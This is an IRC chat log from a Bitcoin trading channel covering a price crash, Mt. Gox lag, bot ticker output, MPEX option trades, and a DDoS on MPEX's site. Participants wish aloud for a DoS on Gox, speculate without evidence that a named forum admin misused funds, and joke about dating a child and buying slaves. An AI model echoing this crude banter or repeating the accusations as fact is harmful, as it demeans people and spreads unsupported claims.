http://blockchain.info/tx/13dffdaef097881acfe9bdb5e6338192242d80161ffec264ee61cf23bc9a1164 Mar 07 02:52:00 Look at this guys Mar 07 02:52:02 which i am mildly proud of Mar 07 02:52:03 maybe start buying slowly Mar 07 02:52:05 [HAVELOCK] [HIM] 10 @ 1.44 = 14.4 BTC [-] Mar 07 02:52:14 bug Mar 07 02:52:15 dude Mar 07 02:52:20 how did u see that coming Mar 07 02:52:20 wtf Mar 07 02:52:29 eligius mined it Mar 07 02:52:32 i woulda believed u honestly if u didnt buy puts and got killed Mar 07 02:52:32 i asked luke Mar 07 02:52:32 I'm worried bad news might hit US, then Europe by tommorow and they'll sell further. The market depth is rather pathetic. Mar 07 02:52:44 eligius mined the 95btc txn block Mar 07 02:52:53 Eduard_Munteanu and to think ppl were whining about s.dice mkt depth Mar 07 02:53:14 mircea_popescu: market depth seemed much better before we hit $40 Mar 07 02:53:26 Like, a couple of days ago. Mar 07 02:53:35 yup, coinbase is empty Mar 07 02:53:51 this is glorious Mar 07 02:53:53 how do I get BTC now? Mar 07 02:54:02 blu3gr1ffon: mtgox? Mar 07 02:54:06 why would you want it? Mar 07 02:54:08 Oh, you have USD. Mar 07 02:54:10 blu3gr1ffon you can't, it has to crash for the iluminati to make bank first. Mar 07 02:54:19 oh fuck it Mar 07 02:54:24 there will be plenty for everyone under $1 Mar 07 02:54:32 hahahaha dub Mar 07 02:54:34 hooray? :/ Mar 07 02:54:42 fudb Mar 07 02:54:53 shh Mar 07 02:55:01 hooray if you sold today Mar 07 02:55:05 not hooray if you bought Mar 07 02:55:15 ;;ticker Mar 07 02:55:16 BTCUSD ticker | Best bid: 35.00000, Best ask: 35.60000, Bid-ask spread: 0.60000, Last trade: 35.60000, 24 hour volume: 157738.28216881, 24 hour low: 33.83133, 24 hour high: 49.09900, 24 hour vwap: 43.65915 Mar 07 02:55:20 Wow Mar 07 02:55:22 le 35 Mar 07 02:55:24 I can't watch Mar 07 02:55:25 it hurts Mar 07 02:55:28 hge haircut today for any buyer Mar 07 02:55:40 teaches them to buy into scams. Mar 07 02:55:51 ;;goxlag Mar 07 02:55:57 Error: invalid syntax (, line 1) Mar 07 02:56:05 so laggy it's broken Mar 07 02:56:05 buy before noon, lose %20 by dinner Mar 07 02:56:19 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 07 02:57:10 ;;calc 157738*43.66 Mar 07 02:57:10 6886841.08 Mar 07 02:57:16 ;;goxlag Mar 07 02:57:19 record? Mar 07 02:57:21 Error: invalid syntax (, line 1) Mar 07 02:57:29 borked Mar 07 02:57:33 ;;ticker Mar 07 02:57:34 BTCUSD ticker | Best bid: 35.10667, Best ask: 35.99000, Bid-ask spread: 0.88333, Last trade: 34.70000, 24 hour volume: 157860.94560379, 24 hour low: 33.83133, 24 hour high: 49.09900, 24 hour vwap: 43.64208 Mar 07 02:57:38 7M$ wow Mar 07 02:57:38 USD$7m volume Mar 07 02:59:12 capitulation Mar 07 02:59:31 this is not france Mar 07 02:59:44 this is BITCOIIIIIN Mar 07 02:59:58 parlay! Mar 07 03:00:06 RIP guys, see you at single digits Mar 07 03:00:27 to change! Mar 07 03:00:54 abnd now the mpoe bot can't quote anymore because the pricefeed finally died. Mar 07 03:01:02 somebody needs to make a motherfucking exchange. Mar 07 03:01:50 it doesn't use bitcoincharts? Mar 07 03:01:51 nah, just use one from magic teh gathering, It'll do Mar 07 03:02:04 jurov mpioe ? yes. Mar 07 03:02:05 i wanna ignore bitcoin Mar 07 03:02:08 like for a mont Mar 07 03:02:12 its hard Mar 07 03:02:12 lol Mar 07 03:02:25 want some help? Mar 07 03:02:53 ahh 34! Mar 07 03:02:59 !ticker m s.mpoe Mar 07 03:03:08 ;;ticker Mar 07 03:03:13 ;;goxlag Mar 07 03:03:14 yeap, back to where we started Mar 07 03:03:14 217.923764 seconds Mar 07 03:03:22 It's so strange that you don't remember any of your poetry. Mar 07 03:03:24 ups and downs. Mar 07 03:03:25 ;;goxlag Mar 07 03:03:25 Error: Failure to retrieve ticker. Try again later. Mar 07 03:03:26 185.819061 seconds Mar 07 03:03:30 assbot, you better watch ur own stuff Mar 07 03:04:08 Whitehouse does not know S.MPOE. Mar 07 03:04:22 omg Mar 07 03:04:23 live.coinbr.com does. shame on you Mar 07 03:04:54 ;;bc,convert eur Mar 07 03:04:59 1 BTC = 34.40000 U.S. dollars = 26.3945369 Euros Mar 07 03:05:04 what happened to options? Mar 07 03:05:14 (17:04) <@assbot> Whitehouse does not know S.MPOE. << O.O ?! LOL Mar 07 03:05:26 lmao Mar 07 03:05:29 Namworld, 1. whale dumped them Mar 07 03:05:44 2. mpoe bot doesn't know what the price is Mar 07 03:05:51 due to general breakage Mar 07 03:06:32 ;;goxlag Mar 07 03:06:37 Error: invalid syntax (, line 1) Mar 07 03:06:42 ;;ticker Mar 07 03:06:52 Error: Failure to retrieve ticker. Try again later. Mar 07 03:07:13 facepalm Mar 07 03:07:24 lag to retrieving lag : 500 seconds Mar 07 03:07:26 ;;ticker Mar 07 03:07:34 BTCUSD ticker | Best bid: 35.42000, Best ask: 35.49800, Bid-ask spread: 0.07800, Last trade: 35.42000, 24 hour volume: 162587.00601570, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.31335 Mar 07 03:07:40 well fuck Mar 07 03:07:45 ill bury my coins Mar 07 03:07:47 be right Mar 07 03:07:50 33.something on stamp Mar 07 03:07:51 back Mar 07 03:10:38 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.91703169 = 917.0317 BTC [+] Mar 07 03:10:41 ;;ticker Mar 07 03:10:42 BTCUSD ticker | Best bid: 34.87188, Best ask: 35.00000, Bid-ask spread: 0.12812, Last trade: 35.00000, 24 hour volume: 163347.55998439, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.27533 Mar 07 03:10:43 ;;goxlag Mar 07 03:10:49 Error: invalid syntax (, line 1) Mar 07 03:11:05 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.18440754 = 184.4075 BTC [-] Mar 07 03:11:09 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20415297 = 204.153 BTC [-] Mar 07 03:11:10 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.22560969 = 225.6097 BTC [-] Mar 07 03:11:11 a ok we be back Mar 07 03:11:15 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.24880864 = 248.8086 BTC [-] Mar 07 03:11:17 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.2932762 = 293.2762 BTC [-] Mar 07 03:11:31 crazy shit, 43.8 vwap Mar 07 03:12:01 Got filled. Now bounce dammit! Mar 07 03:12:03 [MPEX] [O.BTCUSD.P310T] 82 @ 0.06075508 = 4.9819 BTC [+] Mar 07 03:12:17 where at Mar 07 03:13:17 36.33 and maybe 35, don't remember. Had a 33.33 too but not hit yet Mar 07 03:13:25 [MPEX] [O.BTCUSD.P310T] 255 @ 0.06075508 = 15.4925 BTC [+] Mar 07 03:13:40 p31 selling srsly ? Mar 07 03:14:00 ;;goxlag Mar 07 03:14:06 Error: invalid syntax (, line 1) Mar 07 03:14:51 ;;goxlag Mar 07 03:14:57 Error: invalid syntax (, line 1) Mar 07 03:15:11 ;;goxfag Mar 07 03:15:11 Error: "goxfag" is not a valid command. Mar 07 03:15:14 orly. Mar 07 03:15:16 like the other is. Mar 07 03:15:35 [BTCTC] [RSM] 1 @ 0.00899 BTC [+] Mar 07 03:15:36 [BTCTC] [RSM] 19 @ 0.009 = 0.171 BTC [+] Mar 07 03:15:59 gribble chokes on something in https://mtgox.com/api/1/generic/order/lag Mar 07 03:16:17 Whoa why is btc so low? Mar 07 03:16:30 AndroUser512 because white house hacked mpex Mar 07 03:16:52 Nah Mar 07 03:16:54 [MPEX] [WHITEHOUSE] 1 @ 0.1337 [+] Mar 07 03:17:10 !ticker m whitehouse Mar 07 03:17:13 Yesss Mar 07 03:17:31 I don't give a shit who saw what and who did what or who did who. Mar 07 03:18:00 Holy shit! Ingot filled at 33.35 Mar 07 03:18:20 10k ? Mar 07 03:18:25 ;;goxlag Mar 07 03:18:26 24.677975 seconds Mar 07 03:18:27 ;;ticker Mar 07 03:18:36 BTCUSD ticker | Best bid: 36.16249, Best ask: 37.00000, Bid-ask spread: 0.83751, Last trade: 37.00000, 24 hour volume: 167512.14667412, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.08314 Mar 07 03:18:46 33.335 actually Mar 07 03:18:50 I am Mar 07 03:18:54 In the zone Mar 07 03:19:50 ineresting, bitcoinity thinks lag is 18s and price going up to 38 Mar 07 03:20:10 37 on stamp Mar 07 03:20:17 from 33 Mar 07 03:20:20 first rebounce Mar 07 03:20:59 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.18362231 = 183.6223 BTC [-] Mar 07 03:20:59 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20334305 = 203.3431 BTC [-] Mar 07 03:21:02 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.22478093 = 224.7809 BTC [-] Mar 07 03:21:04 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.24796781 = 247.9678 BTC [-] Mar 07 03:21:06 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.29181519 = 291.8152 BTC [-] Mar 07 03:21:18 But for real did something notable happen or is this a good ole correction? Im mobile n cant research atm Mar 07 03:21:22 40 at stamp Mar 07 03:21:30 ;;ticker Mar 07 03:21:30 AndroUser512 nothing really happened. Mar 07 03:21:35 BTCUSD ticker | Best bid: 37.14195, Best ask: 39.47423, Bid-ask spread: 2.33228, Last trade: 39.47423, 24 hour volume: 168473.22517826, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.05309 Mar 07 03:21:37 Thx Mar 07 03:21:46 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.92096486 = 920.9649 BTC [+] Mar 07 03:22:38 AndroUser512 Maybe something behind scenes with coinlab or so. Mar 07 03:22:38 bulls on parade! Mar 07 03:23:01 42 on stamp hehe Mar 07 03:23:06 sp gpx dead? Mar 07 03:24:08 btc-e is higher than gox? oh lol Mar 07 03:27:08 gox really does seem dead? Mar 07 03:27:10 ;;gox lag Mar 07 03:27:10 Error: "gox" is not a valid command. Mar 07 03:27:13 yeah it is Mar 07 03:27:14 ;;goxlag Mar 07 03:27:17 288.353468 seconds Mar 07 03:27:27 ;;ticker Mar 07 03:27:31 BTCUSD ticker | Best bid: 39.47800, Best ask: 39.87296, Bid-ask spread: 0.39496, Last trade: 39.87296, 24 hour volume: 164990.11107081, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.09008 Mar 07 03:29:26 http://www.youtube.com/watch?v=3L4YrGaR8E4 Mar 07 03:31:13 okay we need to really start a collection fuind for mt gox to get them new hardware... Mar 07 03:31:34 like any hw can fix that. Mar 07 03:31:57 what does the nyse have? Mar 07 03:32:00 kakobrekla 3-4k btc didn't help the forum Mar 07 03:32:16 also is it not a hardware issue? where they hacked? Mar 07 03:32:16 its a sw issue Mar 07 03:32:19 if you can't get a forum to run stable out of > 100k usd, mtgox is outside of what the world can affoerd Mar 07 03:32:20 oh Mar 07 03:32:45 i wonder if theymos just kept/spent the fourm money, his plan of fractional reserves i was lik ewtf... Mar 07 03:32:56 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.92093144 = 920.9314 BTC [-] Mar 07 03:32:56 his what ? Mar 07 03:33:04 he invested in bitcoinica or asic Mar 07 03:33:07 im sure Mar 07 03:33:15 lol bitcoinica Mar 07 03:33:26 he was going to let people hold some of the funds but let them spend them... Mar 07 03:33:36 i was thinking yeah, he is doing that so he can, its retarded Mar 07 03:33:40 he's best buddies with interscamgo and nefario Mar 07 03:33:47 so its probably invested there Mar 07 03:33:54 he is no longer friends with nefario lol Mar 07 03:34:05 theymos holds glbse money Mar 07 03:34:08 im pretty sure... Mar 07 03:34:17 be great if he could refund me Mar 07 03:34:25 he was just saying how if neferio lost his keys theymos cant release the money Mar 07 03:34:30 [MPEX] [S.MPOE] 10650 @ 0.00072486 = 7.7198 BTC [-] Mar 07 03:34:36 theymos, lol... Mar 07 03:35:16 ;;ticker Mar 07 03:35:20 BTCUSD ticker | Best bid: 37.91161, Best ask: 38.00000, Bid-ask spread: 0.08839, Last trade: 38.00000, 24 hour volume: 166111.09431322, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.05643 Mar 07 03:35:24 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.14910824 = 149.1082 BTC [-] Mar 07 03:35:25 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.16554201 = 165.542 BTC [-] Mar 07 03:35:34 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.18359431 = 183.5943 BTC [-] Mar 07 03:35:36 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20331669 = 203.3167 BTC [-] Mar 07 03:35:39 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.22475653 = 224.7565 BTC [-] Mar 07 03:35:41 [MPEX] [O.BTCUSD.C330T] 1000 @ 0.24794567 = 247.9457 BTC [-] Mar 07 03:35:50 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.29181519 = 291.8152 BTC [-] Mar 07 03:37:17 ;;goxlag Mar 07 03:37:19 356.354255 seconds Mar 07 03:37:49 bluh Mar 07 03:37:53 Seriously... Mar 07 03:37:57 yeah Mar 07 03:38:10 gox seems dead... like dead dead Mar 07 03:38:12 I'm freakin exhausted by this freakin never fixed lag issues. Mar 07 03:38:27 It just keeps happening again and again and again Mar 07 03:38:28 well, there are 69,000 people hitting refresh on gox Mar 07 03:38:29 so... Mar 07 03:38:54 yeah im doing f5 over and over about as fast as i cant type :) Mar 07 03:39:12 Should hardly be an issue with a proper setup. Mar 07 03:39:19 agree Mar 07 03:39:29 With on demand nodes filling in for demand. Mar 07 03:39:29 oh well coinlab will take over anyway Mar 07 03:39:39 Elastic computing... Mar 07 03:40:43 even reddit noticed: http://www.reddit.com/r/Bitcoin/comments/19szhx/mpexco_is_redirecting_to_whitehousegov/ Mar 07 03:41:28 cheap PR Mar 07 03:42:00 yea, but nobody was around to explain them what happened for 2 hours Mar 07 03:42:19 that's abput their attn span Mar 07 03:42:24 *about Mar 07 03:42:24 wait noagendamarket is eskimobob? Mar 07 03:42:30 hahahha Mar 07 03:42:57 was mpex hacked? Mar 07 03:43:03 he's not but that would be good Mar 07 03:43:08 nope, was not Mar 07 03:43:15 Chaang-Noi, no it was just bought by coinbr Mar 07 03:43:26 lol jurov... right... Mar 07 03:43:26 what? Mar 07 03:43:29 us mpex customers now need to use coinlab Mar 07 03:43:30 lol Mar 07 03:43:41 Chaang: being DDoS'ed Mar 07 03:43:49 cant take this trolling before coffee:) Mar 07 03:43:51 Chaang-Noi read my comment on reddit Mar 07 03:43:53 ahh okay thanks Mar 07 03:43:54 so mpex.co now redirects to whitehouse.gov Mar 07 03:43:56 it's tldr Mar 07 03:44:09 you can access using mpex.coinbr.com for now Mar 07 03:44:23 which proxies the backend Mar 07 03:44:40 jurov: how about my comment Mar 07 03:44:41 only the mpex.co frontend is being DDoS'ed Mar 07 03:44:48 I think Mar 07 03:44:57 oh lol, they redirected the attack to the whitehouse? is that a good idea? :) Mar 07 03:45:21 its an idea Mar 07 03:45:32 yes it is:) Mar 07 03:45:46 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.14908358 = 149.0836 BTC [-] Mar 07 03:45:48 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.16551813 = 165.5181 BTC [-] Mar 07 03:45:53 we have had no word of a drone strike to date Mar 07 03:45:55 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.18357148 = 183.5715 BTC [-] Mar 07 03:45:57 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.20329519 = 203.2952 BTC [-] Mar 07 03:46:04 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.22473663 = 224.7366 BTC [-] Mar 07 03:46:04 Namworld if this causes to overstep my bitvps bandwidth, or causes bitvps to be included in ddos outright Mar 07 03:46:05 [MPEX] [O.BTCUSD.C330T] 18 @ 0.24792761 = 4.4627 BTC [-] Mar 07 03:46:11 what will you do? Mar 07 03:46:39 eww coinbr is on bitvps? Mar 07 03:46:45 jeeez Mar 07 03:47:56 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.9209042 = 920.9042 BTC [-] Mar 07 03:48:03 Chaang-Noi what can it hurt ? ddoser gets to be first drone victim ? Mar 07 03:48:14 i would be surprised, jurov Mar 07 03:48:30 lmao Mar 07 03:48:35 mp, they might think you are part of the attack Mar 07 03:48:53 i know how americans with drones think.... Mar 07 03:49:05 easy to explain Mar 07 03:49:13 just say you meant whitehouse.com Mar 07 03:49:14 not that anything will come of it but still Mar 07 03:49:16 total typo Mar 07 03:49:19 i thought the sec was watching this chan Mar 07 03:49:24 what, they lack reading comprehension ? Mar 07 03:49:39 who told you sec was here? Mar 07 03:49:45 and why would they be here? Mar 07 03:50:04 fbi/dea maybe but sec? lol Mar 07 03:50:04 nefario. Mar 07 03:52:22 ;;ticker Mar 07 03:52:25 hmm, i highly doubt they can get decent evidance from this chan Mar 07 03:52:26 BTCUSD ticker | Best bid: 41.00000, Best ask: 41.92000, Bid-ask spread: 0.92000, Last trade: 41.00000, 24 hour volume: 167242.60774519, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.02128 Mar 07 03:52:30 $41 now wtf Mar 07 03:52:32 is going on\ Mar 07 03:52:37 bitcoin Mar 07 03:52:49 in a stong bull market corrects are sharp and fast bowjob Mar 07 03:53:06 I just sait it out Mar 07 03:53:07 *sat Mar 07 03:53:13 in case of drone strike i'm using human shield Mar 07 03:53:15 none of this bullshit panic buy and sell Mar 07 03:53:18 oh, i thought we were going to buy back in at $36? Mar 07 03:53:26 they have built here insanely dense residential blocks , like 10k people per square kilometer Mar 07 03:53:28 I got burned 800 dollars Mar 07 03:53:29 fuck that Mar 07 03:53:33 and i'm sitting inthe middle Mar 07 03:53:34 no more panic sell Mar 07 03:53:39 and panic buy Mar 07 03:53:41 800 dollars? its just fiat anyway... Mar 07 03:53:48 jurov: ask pakistan how that worked out Mar 07 03:53:50 well it was unrealized gain Mar 07 03:53:53 so its all good Mar 07 03:53:53 lol Mar 07 03:54:05 dub has a point. Mar 07 03:54:18 man Mar 07 03:54:24 some of my classmates have babies now Mar 07 03:54:25 wtf Mar 07 03:54:37 i've known them since second grade.. i still remember those days Mar 07 03:54:41 .. wtf time Mar 07 03:54:41 you dont know how sex works? Mar 07 03:54:43 stahp Mar 07 03:55:08 no, just saying. if i could wake up as a third grader, i could blend in Mar 07 03:55:08 lol Mar 07 03:55:22 http://bits.blogs.nytimes.com/2013/03/06/global-slavery-by-the-numbers/?smid=tw-nytimesbits&seid=auto Mar 07 03:55:25 just with 12 extra years of exp Mar 07 03:55:32 would be odd trying to date a 3rd grader however... Mar 07 03:55:49 at least such casualties need obama's signature. mircea i doubt you have 30 girls around you in the mansion at all times Mar 07 03:55:50 While slavery is illegal across the globe, the SumAll Foundation noted, there are 27 million slaves worldwide, more than in 1860, when there were 25 million. Mar 07 03:55:58 this is like... lincoln won the war on slavery. Mar 07 03:56:14 praise be upon him Mar 07 03:56:17 Sexual slavery brings the slave’s owner $18,000 over the slave’s working life in Thailand (this used to be a big problem, they used to go around in van and steal kids) Mar 07 03:57:02 it woulda nice to panic sell for a bit Mar 07 03:57:05 then bought back Mar 07 03:57:05 lol Mar 07 03:57:17 mammon has a huge grip on us Mar 07 03:57:19 its delicious Mar 07 03:57:33 we are all going burn in hell for it. might as well enjoy life Mar 07 03:57:34 hehe Mar 07 03:57:34 third grader, ic Mar 07 03:59:05 !!Please note!! that the Bitcoin value is changing in daily basis! Therefore the price might also change if the invoice is not paid right away! Mar 07 03:59:05 Reference Number: 11714 Mar 07 03:59:05 Error getting json fileThe current exchange rate we accept for Bitcoin: Mar 07 03:59:05 1 BTC = -0.3 USD Mar 07 03:59:07 what the fucking fuck. Mar 07 03:59:12 100 btc for 30 bux ? rly ?! Mar 07 03:59:27 where? Mar 07 03:59:45 i, too, have heard the sec watches this chan Mar 07 03:59:59 where Mar 07 04:00:00 ill buy it Mar 07 04:00:01 <_< >_> Mar 07 04:00:16 I heard they are wondering about goat Mar 07 04:00:27 they have been trying to talk to me Mar 07 04:00:37 some dumbass "orangesite" hoster Mar 07 04:00:38 they want some insured pass through Mar 07 04:00:43 wants to charge me 100 btc for 30 bux Mar 07 04:01:12 yeah, that insured ppt cost me pigeons, that was some fail Mar 07 04:01:22 did you buy into that? Mar 07 04:01:40 no Mar 07 04:02:33 http://www.btcwebhost.com/cart.php?a=view Mar 07 04:02:37 emote server or file not found Mar 07 04:02:40 well i paid it back quickly Mar 07 04:02:42 dude bitcoin hiosting is a joke. Mar 07 04:03:11 namecheap takes btc nao Mar 07 04:03:39 and does hosting in addition to names Mar 07 04:03:40 i heart namecheap cant wait to pay next bill Mar 07 04:04:02 dub i been hosting with nc since 2001 i think Mar 07 04:04:07 but i won't host there Mar 07 04:04:08 action at gox now, a bit, near 42 Mar 07 04:04:35 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.91731637 = 917.3164 BTC [-] Mar 07 04:04:38 yeah, trying to get my sells in Mar 07 04:05:00 45 on stamp Mar 07 04:05:46 glad we got that correction out of the way Mar 07 04:05:58 that was merely a bear trap Mar 07 04:06:08 # You did not enter your first name # You did not enter your last name # You did not enter your email address # You did not enter your address (line 1) # You did not enter your city # You did not enter your state # You did not enter your postcode # You did not enter your phone number # You are required to enter a security answer # You did not enter a password # Date of Birth is required # Mar 07 04:06:10 dude srlsy ?! Mar 07 04:06:15 bitcoin hosting, date of birth is required ? Mar 07 04:06:21 what is WRONG WITH THESE PEOPLE Mar 07 04:06:31 sweeeet. Mar 07 04:06:45 you forgot gender and boob size Mar 07 04:07:53 <[\\\]> https://twitter.com/gavinandresen/status/309345069461303296 Mar 07 04:07:58 <[\\\]> didn't pirate say the same thing? Mar 07 04:08:07 pretty sure he did Mar 07 04:08:18 maybe i've heard gmaxwell say it too Mar 07 04:08:30 you think they are all the same person [\\\] Mar 07 04:08:36 <[\\\]> duh! Mar 07 04:08:42 man what a trip Mar 07 04:09:03 43.15 Mar 07 04:09:08 gavin gonna jump ship Mar 07 04:09:13 Got out on the bouuuuunce Mar 07 04:09:39 lol war in the dev leadership we dont know about? Mar 07 04:10:01 sould you want to work with those toolbags? Mar 07 04:10:06 would* Mar 07 04:10:32 so ;;ticker Mar 07 04:10:39 ;;ticker Mar 07 04:10:42 BTCUSD ticker | Best bid: 41.50001, Best ask: 41.90000, Bid-ask spread: 0.39999, Last trade: 41.90000, 24 hour volume: 169395.11137261, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.01063 Mar 07 04:10:50 what dev war lol Mar 07 04:10:52 ;;ticker Mar 07 04:10:54 BTCUSD ticker | Best bid: 41.50001, Best ask: 41.90000, Bid-ask spread: 0.39999, Last trade: 41.90000, 24 hour volume: 169388.95028261, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.01069 Mar 07 04:11:21 probably will fade back down from here... Mar 07 04:11:30 gavin just seemed like grumbelinz, but you know he has coins.. he gots to be a rich guy by now Mar 07 04:12:05 how do you know he got coins ? Mar 07 04:12:28 <[\\\]> because satoshi Mar 07 04:12:56 i dont know he has coins, but i highly suspect Mar 07 04:12:59 well he probably has coins since he gave away a fuckton Mar 07 04:13:02 [MPEX] [S.MPOE] 21961 @ 0.00075 = 16.4708 BTC [+] Mar 07 04:13:05 to the faucet Mar 07 04:13:14 its a good bet to assume he has tons of it Mar 07 04:13:15 also if he shorted on bitcoinica, lol Mar 07 04:13:18 ;;calc 31/1.06498 Mar 07 04:13:19 29.1085278597 Mar 07 04:13:39 mpex options so imba Mar 07 04:13:55 !ticker m s.mpoe Mar 07 04:14:05 someone bought 7M shares Mar 07 04:14:08 ;;ticker Mar 07 04:14:10 BTCUSD ticker | Best bid: 41.59217, Best ask: 41.59320, Bid-ask spread: 0.00103, Last trade: 43.90000, 24 hour volume: 169891.04250013, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.01660 Mar 07 04:14:12 http://s24.postimage.org/onppwxshx/35808271.jpg Mar 07 04:14:25 And MPOE is probably down 5k right now. Mar 07 04:20:29 Bugpowdrrr it sold like 70k of calls you know ? Mar 07 04:21:01 or 80k even Mar 07 04:22:23 yeah, 89`125 CALL Mar 07 04:23:12 13`587 PUT Mar 07 04:23:44 Someone was selling calls? Mar 07 04:23:55 something like 14k iirc Mar 07 04:24:07 Oh... right... price is low... can't be purchases Mar 07 04:24:17 Namworld yes they were selling calls bought yest Mar 07 04:26:12 <[\\\]> I see we had a 30% swing in the price today Mar 07 04:26:40 <[\\\]> I hope people realize just how shallow the kiddie pool still is Mar 07 04:26:43 Customers made money on the calls right? Mar 07 04:28:00 nah Mar 07 04:28:13 maybe on the lowo nes, Mar 07 04:28:20 Apparently not, price is popping right back up. Mar 07 04:28:49 the short put covering was pretty big too thoguh Mar 07 04:28:53 hmm Mar 07 04:28:54 ok Mar 07 04:29:08 the short put guy made like .2-3 per contract Mar 07 04:29:10 i wouyld guess Mar 07 04:29:12 Wasn't watching. Eat dinner. Was a good day for me :) Mar 07 04:29:45 Now if we blast thru 50, I will be seriously impressed. Mar 07 04:29:46 network is still pretty hosed Mar 07 04:30:10 I made a few transfers today, no problem at all Mar 07 04:30:23 currently 2.5k unconfirmed Mar 07 04:31:30 still some scope for confidence trashing news hits Mar 07 04:32:05 gox is still lagged by 8 minutes Mar 07 04:32:37 mpex still hacked by the gubbermint Mar 07 04:33:13 $2 still imminent Mar 07 04:34:49 ;;ticker Mar 07 04:34:53 BTCUSD ticker | Best bid: 43.00000, Best ask: 43.01000, Bid-ask spread: 0.01000, Last trade: 43.00000, 24 hour volume: 167804.82008240, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.03618 Mar 07 04:36:08 [MPEX] [S.DICE] 1569 @ 0.0046 = 7.2174 BTC [-] Mar 07 04:39:07 bitcoinity is really holding up the best in these tough conditions Mar 07 04:39:26 thats where im at, i tipped him yesterday Mar 07 04:39:37 yah I should tip too Mar 07 04:39:45 first time I saw the site was today Mar 07 04:39:51 frolm the site whiskey fund: 1EWjHKPYGAJ3v5LnDyBo3Fn1PFsazBstqk | Mar 07 04:39:54 was very helpful. Mar 07 04:40:05 what does it do ? Mar 07 04:40:12 i sent .1337 should buy him a beer or two Mar 07 04:40:16 its live charts mp Mar 07 04:40:21 charts that work Mar 07 04:40:36 its been down for like a year though right? Mar 07 04:40:57 i honestly dont know Mar 07 04:41:09 ;;asks 49 Mar 07 04:41:25 There are currently 18888.341 bitcoins offered at or under 49.0 USD, worth 892422.114396 USD in total. | Data vintage: 0.0024 seconds Mar 07 04:42:31 ah Mar 07 04:43:05 cool, nice to have. Mar 07 04:46:24 and now its down?!? Mar 07 04:46:38 nah just lagged Mar 07 04:47:18 expecting retrace to 40 here Mar 07 04:49:12 yeah lagged again Mar 07 04:52:59 !ticker m ^OIX Mar 07 04:53:05 ;;ticker Mar 07 04:53:08 BTCUSD ticker | Best bid: 42.60000, Best ask: 43.01009, Bid-ask spread: 0.41009, Last trade: 43.02000, 24 hour volume: 168407.58530743, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 43.04250 Mar 07 04:53:21 I don't give a shit who saw what and who did what or who did who. Mar 07 04:56:23 ^OIX: "7d": {"avg": "4711973083","min": "3024713516","max": "4855255527","vsh": "no","vsa": "2.56240676575E+12","cnt": ""} Mar 07 04:56:28 i'm like the new assbot Mar 07 05:01:02 lol assbot :) Mar 07 05:01:11 !goat Mar 07 05:02:09 45 Mar 07 05:02:45 strong Mar 07 05:02:48 impressive Mar 07 05:02:55 mp how much is a slave in romania, i feel too rich/lazy to do my work... Mar 07 05:02:55 Taking the Kruggerand photo Mar 07 05:07:38 i dunno that they have those here. Mar 07 05:09:38 (17:16) <@assbot> [MPEX] [WHITEHOUSE] 1 @ 0.1337 [+] Mar 07 05:09:43 ^^^ lol @ that Mar 07 05:09:58 and yeah +1 on "WE NEED A MOTHERFUCKING EXCHANGE" Mar 07 05:10:13 we need like 3 that are all independant of eachother Mar 07 05:10:36 and good ones that don't fucking break when a guy wants to sell a few, or more. Mar 07 05:11:26 and then with MPEx serving up options and futures, we'll have a nice little btc finance ecosystem Mar 07 05:11:39 but all of this reliance on gox is for the birds. Mar 07 05:12:40 I've been waiting a long time for someone to simply dos gox for a few weeks Mar 07 05:12:56 completely kill bitcoin Mar 07 05:13:30 http://i.imgur.com/iLyZxUZ.jpg Mar 07 05:14:09 hopefully coinlab will be able to "improve" the mtgox experience... Mar 07 05:14:54 smaller exchanges are starting to get some traction, though... Mar 07 05:15:11 bitfloor and bitstamp do a decent job of it... Mar 07 05:15:22 36 again. fuck me Mar 07 05:15:46 told ya Mar 07 05:16:03 that was more violent than expected though Mar 07 05:16:26 Wait, back down to 36? Mar 07 05:16:45 someone needs to tell gox Mar 07 05:16:46 bid still at 43 Mar 07 05:17:20 ;;tslb Mar 07 05:17:22 Time since last block: 40 minutes and 10 seconds Mar 07 05:17:25 eep 1740.26 2 minutes ago 36.000 Mar 07 05:17:25 holy hell Mar 07 05:17:33 what is this about asics and whatnot ? Mar 07 05:17:35 (19:12) < dub> I've been waiting a long time for someone to simply dos gox for a few weeks << exactly. Mar 07 05:18:21 ;;tslb Mar 07 05:18:24 Time since last block: 41 seconds Mar 07 05:18:36 ;;bids 35 Mar 07 05:18:46 There are currently 2015.0753 bitcoins demanded at or over 35.0 USD, worth 70734.225723 USD in total. | Data 